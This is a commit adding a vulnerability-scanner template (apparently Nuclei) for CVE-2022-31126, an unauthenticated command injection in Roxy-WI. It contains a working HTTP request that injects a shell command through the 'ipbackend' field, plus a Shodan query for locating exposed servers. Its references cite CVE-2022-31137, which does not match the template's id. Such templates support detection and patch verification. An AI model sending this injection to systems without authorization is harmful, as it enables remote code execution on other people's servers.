Create CVE-2022-31126.yaml

cves/2022/CVE-2022-31126.yaml

@@ -0,0 +1,46 @@
+id: CVE-2022-31126
+
+info:
+  name: Roxy-WI Unauthenticated Remote Code Executions
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    Roxy-WI versions before 6.1.1.0 are vulnerable to a remote code execution vulnerability. System commands can be run remotely via the subprocess_execute function without processing the inputs received from the user in the /app/options.py file. Attackers need not be authenticated to exploit this vulnerability.
+  remediation: Users are advised to upgrade to latest version.
+  reference:
+    - http://packetstormsecurity.com/files/167805/Roxy-WI-Remote-Command-Execution.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-31137
+    - https://www.cve.org/CVERecord?id=CVE-2022-31137
+  metadata:
+    verified: true
+    shodan-query: http.html:"Roxy-WI"
+  tags: rce,unauth,roxy
+
+requests:
+  - raw:
+      - |
+        POST /app/options.py HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}/app/login.py
+        Accept-Encoding: gzip, deflate
+        Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+
+        alert_consumer=1&serv=127.0.0.1&ipbackend=";id+##&backend_server=127.0.0.1
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "uid="
+          - "gid="
+          - "groups="
+        condition: and
+
+      - type: status
+        status:
+          - 200